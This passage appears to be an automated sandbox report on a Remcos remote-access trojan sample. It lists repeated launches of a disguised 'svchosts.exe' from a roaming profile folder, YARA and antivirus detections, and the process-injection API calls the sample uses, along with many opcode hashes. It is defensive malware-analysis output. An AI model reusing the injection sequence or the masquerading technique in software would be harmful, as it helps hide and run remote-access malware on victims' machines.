                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:13:20:19
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0xc10000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 40%, Metadefender, Browse
                                        • Detection: 86%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:13:20:27
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0x790000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:35
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0x5f0000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:56
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x340000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:13:20:57
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x810000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:21:05
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x7ff6741d0000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:21:12
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x900000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        Disassembly

                                        Code Analysis


                                          Executed Functions

                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dccc835ee246162292e94937dc75cf5aefc34cdf8727585e2dbefe5831bb830f
                                          • Instruction ID: 8a09b415ee3c3c853e8064f43c5876f00410bad59d243dc8b2c538069049bd56
                                          • Opcode Fuzzy Hash: dccc835ee246162292e94937dc75cf5aefc34cdf8727585e2dbefe5831bb830f
                                          • Instruction Fuzzy Hash: 4E21E6B1E016188BEB58CFA7D9802DEBBF3AFC8311F14C16AD509B6268DB340A45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 04B597CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026335F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 04B55661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02633AD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04B5BE66,?,?,?,?,?), ref: 04B5BF27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0263394F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02633887
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B59849,00000800,00000000,00000000), ref: 04B59A5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02633A0B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 026345A5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • API String ID:
                                          • Opcode ID: a97797ab92d391f5967f7ce432bed0355a31a4fce17aca33108954ac748560bf
                                          • Instruction ID: 641ed4a49998220a0a87922a7274637943021801dfd13700715c04db26b7862e
                                          • Opcode Fuzzy Hash: a97797ab92d391f5967f7ce432bed0355a31a4fce17aca33108954ac748560bf
                                          • Instruction Fuzzy Hash: ABC16B34B001089FCB54EF6AD999AAE7BF6EF88204F118029F506D73A1DB34DD01CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6635fe1ca67ef9847f935ff5a6d054a8fcf8a8db7d60ddf865be1fd4092f2adb
                                          • Instruction ID: 308478b090f5f829e9c17c280b47b4eee013268ba00ad612a8de1f90bbebec20
                                          • Opcode Fuzzy Hash: 6635fe1ca67ef9847f935ff5a6d054a8fcf8a8db7d60ddf865be1fd4092f2adb
                                          • Instruction Fuzzy Hash: DC910334E00229DFDB64DFA5C984BDDBBB2BF89304F1085A9E408B7251DB359A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97ab384c8da0907511997abac25d78af347c7cdf5c5b1624410acdda04ac368a
                                          • Instruction ID: 5af8b1a64dc2f070b34bcfa8cb07d0a30ac37d6c71f32d51214243b175a1bb92
                                          • Opcode Fuzzy Hash: 97ab384c8da0907511997abac25d78af347c7cdf5c5b1624410acdda04ac368a
                                          • Instruction Fuzzy Hash: 61717A35A00104DFCB50DF69D498AED7BB2EB88215F184469E802A77A0DB31DE01CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e941441e3051c9631006f9555ae75646e5653645f390b5463e55606cbca9c3a
                                          • Instruction ID: 5bf971951827a7944f4f0160b887ec3bdd766af04ae9660e129eaf41fc016b38
                                          • Opcode Fuzzy Hash: 1e941441e3051c9631006f9555ae75646e5653645f390b5463e55606cbca9c3a
                                          • Instruction Fuzzy Hash: CA615E70E01249DFCB44EFA5E58869CBBF2FB88314F149866E519EB368DB309941DF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c5f38cc313d4a3b35791604106148c2f7dd7bf58ef3d4202477beb6c1e3c3822
                                          • Instruction ID: 2e94efeb2b9c5a18ac72e83d99af3eeeafee8ae6c9b902f4eb67a5ceedfd4b07
                                          • Opcode Fuzzy Hash: c5f38cc313d4a3b35791604106148c2f7dd7bf58ef3d4202477beb6c1e3c3822
                                          • Instruction Fuzzy Hash: 2D419A75A00215CFCB54CFAAC988AAEB7B2FF88704F158569E401E7360D731E841CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db1cbbe16fe5b18e59e06263154cccc5ee22a078e6ff7d9eff8b6962bbc7586f
                                          • Instruction ID: 62d9299de3c8f2aaffb42fafddc76ebb4e36f241da7a9e08b1cb25e0aeb4bf9c
                                          • Opcode Fuzzy Hash: db1cbbe16fe5b18e59e06263154cccc5ee22a078e6ff7d9eff8b6962bbc7586f
                                          • Instruction Fuzzy Hash: 93414B34B00119AFCF15EF65D888AAE77A7EF84304F048429F90297294DB39DE52CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcecf00202cd2c5e38a724fd70a2d70bb52ab762dd0c2e1d64d43a101489d86e
                                          • Instruction ID: a048d548c5415f9318500a48a937a9db55c22c83435ff737a69fbd898aa8f151
                                          • Opcode Fuzzy Hash: bcecf00202cd2c5e38a724fd70a2d70bb52ab762dd0c2e1d64d43a101489d86e
                                          • Instruction Fuzzy Hash: 67411974E016189FDB08DFAAC9816EEFBF2EF88300F14C46AD414AB355DB349946CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68788fd93d3c4781f03ab019b6f3e5b21f7947ff196b36402b0a2538301d55b4
                                          • Instruction ID: 3238c5c39922580e4186fb3fb740173135ed1070b2579ac5770674ea25a038f3
                                          • Opcode Fuzzy Hash: 68788fd93d3c4781f03ab019b6f3e5b21f7947ff196b36402b0a2538301d55b4
                                          • Instruction Fuzzy Hash: 6641E674E002189FDF18CFE6D984A9EBBB2BF89300F24812AE405BB364DB349945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0adefaa0e097369ca19a1d2cec10b7f4a43beefb44dfb4979c62b386944157c5
                                          • Instruction ID: 339825d1e184c6fe5b7bbea0b9355295b68310d9a865fe2ca7b234af8c2ce0ce
                                          • Opcode Fuzzy Hash: 0adefaa0e097369ca19a1d2cec10b7f4a43beefb44dfb4979c62b386944157c5
                                          • Instruction Fuzzy Hash: 2D310771E04219DFDB18DFA6D8847DEBBB2AF89304F1085AAD508A7250EB345A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2799033bb43b5bf46fd68e4ec6c4925a70dbde4459ae2c4b70c5ed5296beb605
                                          • Instruction ID: 8b03be15306099d3e706c9bc956c269a852cc82f5231a6399f0d6403a9a8726c
                                          • Opcode Fuzzy Hash: 2799033bb43b5bf46fd68e4ec6c4925a70dbde4459ae2c4b70c5ed5296beb605
                                          • Instruction Fuzzy Hash: 4D312AB5E0420A9FCB44CF9AC480AAEFBF2FF88300F14956AD815A7354D3349A41CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 707674363d26560e6bb203a5331aecdf2373e6b61d51a7a6b979b2b444228c17
                                          • Instruction ID: 6c6ad45386cc1f6d18c71abcd95a4c697f78c6a3a6f91a1af8f5a7ba1d632913
                                          • Opcode Fuzzy Hash: 707674363d26560e6bb203a5331aecdf2373e6b61d51a7a6b979b2b444228c17
                                          • Instruction Fuzzy Hash: 2A31C9B4E142099FCB44CFAAC580AAEFBF1FF88300F10956AD815A7354D7349A41CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296333382.0000000000CBD000.00000040.00000001.sdmp, Offset: 00CBD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52d5e3689b09a586764675a910085315e9206cc890e4bde98cfffcc160d19567
                                          • Instruction ID: a3c51ce32d435e45eebae0e2a9dcbf1e331643993fd69f4c0b9cd60d34cd6518
                                          • Opcode Fuzzy Hash: 52d5e3689b09a586764675a910085315e9206cc890e4bde98cfffcc160d19567
                                          • Instruction Fuzzy Hash: 152137B1504240DFCB21DF54D9C0FA6BF65FB88328F24C5A9E8064F246D336E94ADBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9223e701326c57251955ff95dd4a10494bf4bf2446fd1c225a14766a05d767db
                                          • Instruction ID: e57f52d25995433ee667d3d90257c23d72075b1438c904b872ed402d10e4b54a
                                          • Opcode Fuzzy Hash: 9223e701326c57251955ff95dd4a10494bf4bf2446fd1c225a14766a05d767db
                                          • Instruction Fuzzy Hash: 3A314C70E042099FDB44CF96D5809AEBBF2FF89304F21C9AAE014A7365D3349A41CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97995171a77ec2741e372d845ed5d15bf7bce2ae85d8686ed75f7bf4fcb6a62c
                                          • Instruction ID: 87df7e84674dfc5af8e8a1ba9c3f1cb02ee0ea827e1584680fc75c68a6657fea
                                          • Opcode Fuzzy Hash: 97995171a77ec2741e372d845ed5d15bf7bce2ae85d8686ed75f7bf4fcb6a62c
                                          • Instruction Fuzzy Hash: 9C319CB0D0420ADFCB44CFA6C6805AEFBF2FF89300F14D5AAD004A7254D3308A41CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56c8ba3da51b1b5358b205f7b23df188764de5f1cb587f00fe593637876a7152
                                          • Instruction ID: b2ba82e7bb1793797e8d11411e038b3c322f58127c1051ae47a51d9138051607
                                          • Opcode Fuzzy Hash: 56c8ba3da51b1b5358b205f7b23df188764de5f1cb587f00fe593637876a7152
                                          • Instruction Fuzzy Hash: EE219D75A002068FCB51DFA9C4C4AAEBBB1EF89311F1945A6E905DB362DB30DD41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296354689.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f1ccd4f3c73aef7a29defc8a5742eb89ae1ab5c648e9a76a8acb9bc20d075c2
                                          • Instruction ID: 9156203981af0a15bc1cc92376f688d7eb5baeb529c391a84d3ed0aa7476b0b3
                                          • Opcode Fuzzy Hash: 8f1ccd4f3c73aef7a29defc8a5742eb89ae1ab5c648e9a76a8acb9bc20d075c2
                                          • Instruction Fuzzy Hash: 1321D075504240DFCB14DF58D9C0F26BBA5FB84324F24C9BDE80A4B246C33AD847CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296354689.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 598452071840a683862b032bf00c137508b77470dcd02cd14754946956254854
                                          • Instruction ID: 4c499ca046c61fe980a7add09f51bb3569e5bafd9abf8992744a60996ac78eb8
                                          • Opcode Fuzzy Hash: 598452071840a683862b032bf00c137508b77470dcd02cd14754946956254854
                                          • Instruction Fuzzy Hash: 3221F2B1504200EFDB11DF50D9C0F26BBA5FB84324F24CABDE80A4B246C336DC46CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296354689.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6266e53e831e66684c456efcc61860b789c1f0fe70abed1afa73b5fcdc70eb41
                                          • Instruction ID: 0ddc9365a9bf9815447b0689adf0a2f49fa7c73f548f4017f8f0391187da918a
                                          • Opcode Fuzzy Hash: 6266e53e831e66684c456efcc61860b789c1f0fe70abed1afa73b5fcdc70eb41
                                          • Instruction Fuzzy Hash: 632192755093C08FCB02CF24D990B15BF71EB46314F28C5EED8498B697C33A980ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf62ea934fc85d4202638222e17eab50253d589503700c14408cb3a1763e9773
                                          • Instruction ID: 9fcc554b789778190011666f953efe11dbc7ca153241eec80d1bcd5a5f4e0ab2
                                          • Opcode Fuzzy Hash: cf62ea934fc85d4202638222e17eab50253d589503700c14408cb3a1763e9773
                                          • Instruction Fuzzy Hash: E0119434F181148FDB64ABBAA8902BF76A6AF88750F15452EF506C7285DB30890087D6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296333382.0000000000CBD000.00000040.00000001.sdmp, Offset: 00CBD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                          • Instruction ID: 07efeb23639ebb258d5203fd9bd06d021cc6c2fbc01df7c0868de574a348ac91
                                          • Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                          • Instruction Fuzzy Hash: AE11E6B6404280CFCF11CF14D9C4B56BF71FB94324F24C6A9D8450B616C33AD95ACBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49b6a4a9e2e8033bc3d96d3f2c7e5506321639e0148ada0ae2530301535ade41
                                          • Instruction ID: b5d1fec46a6b6ee9ed8bc68724b503bbdbc71fc17c7f1105124ce6588faa855e
                                          • Opcode Fuzzy Hash: 49b6a4a9e2e8033bc3d96d3f2c7e5506321639e0148ada0ae2530301535ade41
                                          • Instruction Fuzzy Hash: D411C830905248EFCB00FFA4D845ADDBFB5EF40304F508899E4048B266E7359E25DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296354689.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                          • Instruction ID: 49a5f6c0a49c0d9ee405b63fa1250f2dddc549ea535c039a32e11e6393faf74b
                                          • Opcode Fuzzy Hash: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                          • Instruction Fuzzy Hash: BE119D76904280DFCB11CF14D9C4B15FBB1FB84324F28C6AED84A4B656C33AD94ACB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296333382.0000000000CBD000.00000040.00000001.sdmp, Offset: 00CBD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efe28c785c93e6473b02a4746e58cd014657d14a4d7bdb2b0d02fe5180a11b11
                                          • Instruction ID: a97620619755ff9f9cad397b6092a86f6dc69640d059d0613b1908ead4a22c35
                                          • Opcode Fuzzy Hash: efe28c785c93e6473b02a4746e58cd014657d14a4d7bdb2b0d02fe5180a11b11
                                          • Instruction Fuzzy Hash: D6014771408340AAE7205F16CCC4BE6BB9CEF41324F18859AFD1A6B24AEB399844C6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296333382.0000000000CBD000.00000040.00000001.sdmp, Offset: 00CBD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c6d900fcb1d7d43b772075e2b6f13fd7d83fb013f55a42be34363db0b16e074
                                          • Instruction ID: 2d90230a6775ef5583c8142eacb480c19af298f79563925dec9b3a7ef61117d3
                                          • Opcode Fuzzy Hash: 0c6d900fcb1d7d43b772075e2b6f13fd7d83fb013f55a42be34363db0b16e074
                                          • Instruction Fuzzy Hash: 01F0F671404344AFE7108E16DCC4BA2FF98EF81334F18C09AED195B28AD7799C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9cedb03e87fd4c3ef431ccafbdbd56b74c990e9504013a2689c935ba421d919e
                                          • Instruction ID: c741c72235be4b52f0263fba666b5d09442b65ef6f99ca5a62ba5469bcbee0bd
                                          • Opcode Fuzzy Hash: 9cedb03e87fd4c3ef431ccafbdbd56b74c990e9504013a2689c935ba421d919e
